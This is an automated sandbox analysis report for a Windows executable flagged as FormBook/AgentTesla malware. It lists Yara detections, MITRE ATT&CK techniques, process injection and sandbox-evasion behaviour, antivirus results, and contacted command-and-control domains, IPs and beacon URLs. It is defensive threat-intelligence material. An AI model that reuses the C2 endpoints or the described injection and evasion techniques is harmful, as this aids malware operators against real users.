          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery331Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion141SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion141NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 433531 Sample: XhU4EXUp0x.exe Startdate: 12/06/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 6 other signatures 2->42 10 XhU4EXUp0x.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...\XhU4EXUp0x.exe.log, ASCII 10->28 dropped 52 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->52 54 Tries to detect virtualization through RDTSC time measurements 10->54 14 XhU4EXUp0x.exe 10->14         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.rsyueda.com 23.82.229.132, 49765, 80 LEASEWEB-USA-SEA-10US United States 17->30 32 gentrypartyof8.com 66.235.200.146, 49762, 80 CLOUDFLARENETUS United States 17->32 34 www.gentrypartyof8.com 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 raserver.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          XhU4EXUp0x.exe21%VirustotalBrowse
          XhU4EXUp0x.exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          XhU4EXUp0x.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.XhU4EXUp0x.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.XhU4EXUp0x.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.gentrypartyof8.com/nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH0%Avira URL Cloudsafe
          http://www.rsyueda.com/nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.yellow-wink.com/nff/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.rsyueda.com
          		23.82.229.132
          		truetrue
            		unknown
            gentrypartyof8.com
            		66.235.200.146
            		truetrue
              		unknown
              www.gentrypartyof8.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.gentrypartyof8.com/nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwHtrue
                • Avira URL Cloud: safe
                		unknown
                http://www.rsyueda.com/nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwHtrue
                • Avira URL Cloud: safe
                		unknown
                www.yellow-wink.com/nff/true
                • Avira URL Cloud: safe
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                          		high
                          http://www.tiro.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                            		high
                            http://www.goodfont.co.krexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssXhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpfalse
                              		high
                              http://www.carterandcone.comlexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.%s.comPAexplorer.exe, 00000005.00000000.660621066.0000000002B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		low
                                    http://www.fonts.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.sakkal.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        66.235.200.146
                                        		gentrypartyof8.comUnited States
                                        		13335CLOUDFLARENETUStrue
                                        23.82.229.132
                                        		www.rsyueda.comUnited States
                                        		396190LEASEWEB-USA-SEA-10UStrue

                                        General Information

                                        Joe Sandbox Version:32.0.0 Black Diamond
                                        Analysis ID:433531
                                        Start date:12.06.2021
                                        Start time:08:56:25
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 21s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:XhU4EXUp0x.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:21
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@7/1@2/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 17.9% (good quality ratio 16.3%)
                                        • Quality average: 73.8%
                                        • Quality standard deviation: 30.8%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 204.79.197.222, 13.88.21.125, 52.147.198.201, 52.113.196.254, 104.43.139.144, 20.82.209.104, 20.54.104.15, 20.54.7.98, 205.185.216.10, 205.185.216.42, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.210.154
                                        • Excluded domains from analysis (whitelisted): fp.msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, a-0019.a-msedge.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, teams-9999.teams-msedge.net, a-0019.standard.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, 1.perf.msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        08:57:13API Interceptor1x Sleep call for process: XhU4EXUp0x.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        66.235.200.146New Purchase Order20210609.exeGet hashmaliciousBrowse
                                        • www.anderson-anderson.com/un8c/?6lGd=HBZ81PLPUzqhOj&3f-H3H=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilL37bAvbTVrR
                                        packa.....(1).exeGet hashmaliciousBrowse
                                        • www.apexpioneer.com/wdva/?kfD4qZ=qWl9Mj/s+HilBOtVYaSZVR6j4m9BeajRzFuKOkq+ALHs1EAUycBQc15lgYPA8iZZOcHD&kr0=dbF0vFoPNvL
                                        New order 201534.pdf.exeGet hashmaliciousBrowse
                                        • www.thedailymino.com/sbqi/?8pdPxFYX=jXb6weh8fwwMUEgPJJl7RJ0MRYZqFSz6owdMJ8CEOPRP4uFAZVBZ7eXod2M1Xtzg6qh0&_FNlAt=tVEl9tDHXfB4
                                        New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                        • www.anderson-anderson.com/un8c/?D8ODAr=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilIXrUh/jNwCW&mJ=V6AHzvxh
                                        New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                        • www.anderson-anderson.com/un8c/?Lh0l=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilIXrUh/jNwCW&VTKh=vBZtYDQXqZ4DGn
                                        y6f8O0kbEB.exeGet hashmaliciousBrowse
                                        • www.taratakeson.com/oerg/?ndndnZ=UtWlYrO0rhjH&mHLD_0=dr4pMwcdhZcmPSbPHAIEo/sox+gcSbBb1FVNS74e5R2NObgAqDDHvg7Hj8ybvDNWoVhE
                                        bibviv.exeGet hashmaliciousBrowse
                                        • www.milkweedmagic.com/vns/
                                        INVOICE PAYMENT.exeGet hashmaliciousBrowse
                                        • www.milkweedmagic.com/vns/?nloHn6=zPqtcJu8h&OH5LRV=dxIiDTMmZIUelDEuKFBNrZVGQoGe1rqzTAT6E2MP4OmWiXtk9zOjG3OmaVxdpx2vqn8e
                                        BL Draft copy.exeGet hashmaliciousBrowse
                                        • www.smallpeo.com/sx8c/?inzXrV1h=CQJBYFRSx3Pkz4hmjXzNOjG1WISSVLs1fX4LX3HiJ6zoF9rBVgsTdld9Os8/rzow8SJA&SP=cnxT3HrH
                                        2os1TIXTXk.exeGet hashmaliciousBrowse
                                        • www.iidiotproof.com/mdi/?Yn=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqYOF+JlL3+nX&mvKtg=Y4C4_fDHvx98fJ5
                                        03102021.xlsGet hashmaliciousBrowse
                                        • baxtercode.com/qkhpnucmzts/44267.5622407407.dat
                                        03102021.xlsGet hashmaliciousBrowse
                                        • baxtercode.com/qkhpnucmzts/44267.5507399306.dat
                                        03102021.xlsGet hashmaliciousBrowse
                                        • baxtercode.com/qkhpnucmzts/44267.5414023148.dat
                                        orii11.exeGet hashmaliciousBrowse
                                        • www.iidiotproof.com/mdi/?ndn4iL=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqbu/uYFztZGQ&OR9=uTypBLyh3rCtd
                                        orii11.exeGet hashmaliciousBrowse
                                        • www.iidiotproof.com/mdi/?8pp=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqYOvh5VLz8vX&sZCx=1bYdfPf8ef5pjPm
                                        PO.x00991882822.xlsmGet hashmaliciousBrowse
                                        • www.rmpclean.com/private/?-ZL=kjFT_jlXCZeHrh&FVTt=Uhbi9DfUBq2i/1fkh0yGI21N5OQMN5zBtkTJbOEZT9D8cf6FKtFeyjvu/14BaEQ5k4UB
                                        Parcel _009887 .exeGet hashmaliciousBrowse
                                        • www.ocicoxford.com/csw6/?t8bHuZw=efwaGXT9IzbmNtOzDnCu+48vppNLQWQKGJFN33tYCz0tX5X/vDpmiH8bd6jrvtNwDjI3p9k8/g==&2d=llsp
                                        P.O-DT1692.exeGet hashmaliciousBrowse
                                        • www.drtarver.com/g65/?hL0=/G2o2cr0v4Q8hBBM9UJDjH+yY22wUVLVeIfqLGL5GIR6ySKGryVcUhqqpJFQ9LO6Iwep&Wr=LhnLHrv8d
                                        SAMSUNG C&T UPCOMING PROJECTS19-MP.exe.exeGet hashmaliciousBrowse
                                        • www.elrodeorestaurantbw.com/cdl/?Mfg=/L1lIqGS5r2x+RFPi+XkQGVOlUslsJfdMM9Npew4xv9wNb7VMt18zc8R4PiLn7n17TkB&uVxpj=ojO0dJYX1B
                                        AWB_SHIPPING_DOCUMENT_pdf.exeGet hashmaliciousBrowse
                                        • www.lincolnreadymeals.com/me2z/?absDxBr=WOPwKhxv/yLwNDnXBLmuN1eR3SzsT6kHFNnvJn0nwfrdF7aBYBJOwB9MozwDSP7grAKd&pPX=EFQpsLbPFZvt

                                        Domains

                                        No context

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        CLOUDFLARENETUS1VTzed95Tz.exeGet hashmaliciousBrowse
                                        • 104.21.45.72
                                        DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        Proforma Invoice.exeGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        TLUN2Qvsx2.exeGet hashmaliciousBrowse
                                        • 104.23.98.190
                                        rL2F1mjb2l.exeGet hashmaliciousBrowse
                                        • 104.23.99.190
                                        tvijATOn6L.exeGet hashmaliciousBrowse
                                        • 104.23.99.190
                                        8964532115.exeGet hashmaliciousBrowse
                                        • 172.67.188.154
                                        DHL_2761228.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        0900988099900000.exeGet hashmaliciousBrowse
                                        • 172.67.188.154
                                        Payment Advice.exeGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        VM64DGCRMN5XGK.htmGet hashmaliciousBrowse
                                        • 104.16.18.94
                                        1EFNborqwh.dllGet hashmaliciousBrowse
                                        • 104.20.185.68
                                        OrderKLB210568.exeGet hashmaliciousBrowse
                                        • 104.16.13.194
                                        Purchase_Order.exeGet hashmaliciousBrowse
                                        • 104.21.64.212
                                        main_setup_x86x64.exeGet hashmaliciousBrowse
                                        • 172.67.188.69
                                        b9f5bca9a22f08aad48674bc42e4eaf72ab8aa3d652ba.exeGet hashmaliciousBrowse
                                        • 104.26.9.187
                                        LsWgkxVLk1.dllGet hashmaliciousBrowse
                                        • 104.20.184.68
                                        HHHyXsu7Vj.dllGet hashmaliciousBrowse
                                        • 104.20.184.68
                                        7Nboq835Fc.exeGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        moq fob order.exeGet hashmaliciousBrowse
                                        • 172.67.188.154
                                        LEASEWEB-USA-SEA-10USProduct_Samples.exeGet hashmaliciousBrowse
                                        • 23.82.229.141
                                        RFQ_BRAT_METAL_TECH_LTD.exeGet hashmaliciousBrowse
                                        • 23.82.229.141
                                        Airwaybill # 6913321715.exeGet hashmaliciousBrowse
                                        • 23.82.149.3
                                        8UsA.shGet hashmaliciousBrowse
                                        • 172.241.159.235
                                        493bfe21_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • 23.82.149.3
                                        PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exeGet hashmaliciousBrowse
                                        • 23.82.229.141
                                        Rio International LLC URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                        • 23.82.229.141
                                        NEW ORDER ELO-05756485.exeGet hashmaliciousBrowse
                                        • 23.82.149.10
                                        OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exeGet hashmaliciousBrowse
                                        • 23.82.230.186
                                        order samples 056-059_pdf.exeGet hashmaliciousBrowse
                                        • 23.82.225.149
                                        order samples 056-062 _pdf.exeGet hashmaliciousBrowse
                                        • 23.82.225.149
                                        OPSzlwylj5.exeGet hashmaliciousBrowse
                                        • 173.234.15.207
                                        BSG_ptf.exeGet hashmaliciousBrowse
                                        • 23.82.225.149
                                        FeDex Shipment Confirmation.exeGet hashmaliciousBrowse
                                        • 23.82.229.136
                                        FeDex Shipment Confirmation.exeGet hashmaliciousBrowse
                                        • 23.82.229.136
                                        yqfUONVqpk.exeGet hashmaliciousBrowse
                                        • 173.234.15.207
                                        sntU1XoQa3.exeGet hashmaliciousBrowse
                                        • 173.234.15.207
                                        vvUkaRlJUJ.exeGet hashmaliciousBrowse
                                        • 173.234.15.207
                                        ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                        • 23.82.78.4
                                        hkcmd.exeGet hashmaliciousBrowse
                                        • 173.234.15.207

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XhU4EXUp0x.exe.log
                                        Process:C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1406
                                        Entropy (8bit):5.341099307467139
                                        Encrypted:false
                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                                        MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                                        SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                                        SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
